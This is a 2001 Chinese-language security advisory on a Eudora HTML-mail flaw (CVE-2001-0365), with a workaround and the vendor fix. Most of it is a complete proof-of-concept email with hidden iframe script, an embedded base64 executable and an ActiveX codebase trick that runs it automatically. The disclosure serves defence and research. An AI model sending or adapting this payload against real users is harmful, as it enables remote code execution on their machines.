首页 -> 安全研究
安全研究
安全漏洞
Eudora 'Use Microsoft Viewer'开关导致恶意代码执行漏洞
发布日期:2001-03-28
更新日期:2001-03-28
受影响系统:
不受影响系统:
Qualcomm Eudora 5.0.2
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
描述:
Qualcomm Eudora 5.1
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
BUGTRAQ ID: 2490
CVE(CAN) ID: CVE-2001-0365
Eudora 中如果打开了'Use Microsoft Viewer'开关,将使用IE来浏览html邮件。
Eudora也有一个'allow executables in HTML content'选项,尽管手册中建议
禁止这个选项并且缺省它也被禁止了,攻击者仍然可以绕过这个限制在远程主机
上执行任意代码,如果'Use Microsoft Viewer'开关被打开的话。
<*来源:http-equiv@excite.com (http-equiv@excite.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http-equiv@excite.com提供了下列测试代码:
发送下列邮件给eudora用户,就可能使该用户执行附件中的程序。
注意,用户即使没有手动执行附件程序也会受影响。
MIME-Version: 1.0
To:
Subject: YOU!DORA
Content-Type: multipart/related;
boundary="------------CF416DC77A62458520258885"
--------------CF416DC77A62458520258885
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
<!doctype html public "-//w3c//dtd html 3.2//en">
<html>
<head>
<title>YOU!DORA</title>
</head>
<body bgcolor="#0000ff" text="#000000" link="#0000ff" vlink="#800080" alink="#ff0000">
<br>
<br>
<img SRC="cid:mr.malware.to.you" style="display:none">
<img id=W0W src="cid:malware.com" style="display:none">
<center><h6>YOU!DORA</h6></center>
<IFRAME id=malware width=10 height=10 style="display:none" ></IFRAME>
<script>
// 18.03.01 http://www.malware.com
malware.location.href=W0W.src
</script>
</body>
</html>
--------------CF416DC77A62458520258885
Content-Type: application/octet-stream
Content-ID: <mr.malware.to.you>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.exe"
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
AAARAAASAAATAAAUAAAVAAAWAAAXAAAYAAAZAAAaAAAbAAAcAAAdAAAeAAAfAAAgAAAhAAAi
AAAjAAAkAAAlAAAmAAAnAAAoAAApAAAqAAArAAAsAAAtAAAuAAAvAAAwAAAxAAAyAAAzAAA0
AAA1AAA2AAA3AAA4AAA5AAA6AAA7AAA8AAA9AAA+AAA/AAA/AAA/AAA/AQA/AgA/AwA/BAA/
BQA/BgA/BwA/CAA/CQA/CgA/CwA/DAA/DQA/DgA/DwA/EAA/EQA/EgA/EwA/FAA/FQA/FgA/
FwA/GAA/GQA/GgA/GwA/HAA/HQA/HgA/HwA/IAA/IQA/IgA/IwA/JAA/JQA/JgA/JwA/KAA/
KQA/KgA/KwA/LAA/LQA/LgA/LwA/MAA/MQA/MgA/MwA/NAA/NQA/NgA/NwA/OAA/OQA/OgA/
OwA/PAA/PQA/PgA/PwA/PwA/PwA/PwE/PwI/PwM/PwQ/PwU/PwY/Pwc/Pwg/Pwk/Pwo/Pws/
Pww/Pw0/Pw4/Pw8/PxA/PxE/PxI/PxM/PxQ/PxU/PxY/Pxc/Pxg/Pxk/Pxo/Pxs/Pxw/Px0/
Px4/Px8/PyA/PyE/PyI/PyM/PyQ/PyU/PyY/Pyc/Pyg/Pyk/Pyo/Pys/Pyw/Py0/Py4/Py8/
PzA/PzE/PzI/PzM/PzQ/PzU/PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=
--------------CF416DC77A62458520258885
Content-Type: application/octet-stream; charset=iso-8859-1
Content-ID: <malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="You!DORA.html"
IDxzY3JpcHQ+DQovLyBodHRwOi8vd3d3Lm1hbHdhcmUuY29tIC0gMTguMDMuMDENCmRvY3Vt
ZW50LndyaXRlbG4oJzxJRlJBTUUgSUQ9cnVubmVyd2luIFdJRFRIPTAgSEVJR0hUPTAgU1JD
PSJhYm91dDpibGFuayI+PC9JRlJBTUU+Jyk7DQpmdW5jdGlvbiBsaW5raXQoZmlsZW5hbWUp
DQp7DQogICBzdHJwYWdlc3RhcnQgPSAiPEhUTUw+PEhFQUQ+PC9IRUFEPjxCT0RZPjxPQkpF
Q1QgICBDTEFTU0lEPSIgKw0KICAgICAgIidDTFNJRDoxNTU4OUZBMS1DNDU2LTExQ0UtQkYw
MS0wMEFBMDA1NTU5NUEnIENPREVCQVNFPSciOw0KICAgc3RycGFnZWVuZCA9ICInPjwvT0JK
RUNUPjwvQk9EWT48L0hUTUw+IjsNCiAgIHJ1bm5lcndpbi5kb2N1bWVudC5vcGVuKCk7DQog
ICBydW5uZXJ3aW4uZG9jdW1lbnQud3JpdGUoc3RycGFnZXN0YXJ0ICsgZmlsZW5hbWUgKyBz
dHJwYWdlZW5kKTsNCiB9DQpsaW5raXQoJ21hbHdhcmUuZXhlJyk7DQo8L3NjcmlwdD4=
--------------CF416DC77A62458520258885--
建议:
临时解决方案:
禁止'Use Microsoft Viewer'和'allow executables in HTML content'选项。
或者在IE设置中禁止执行java脚本和Active X
厂商补丁:
这个问题已经在Eudora 5.1中修复。目前5.1 beta版可以在下列地址下载:
http://www.eudora.com/betas
浏览次数:4783
严重程度:0(网友投票)
绿盟科技给您安全的保障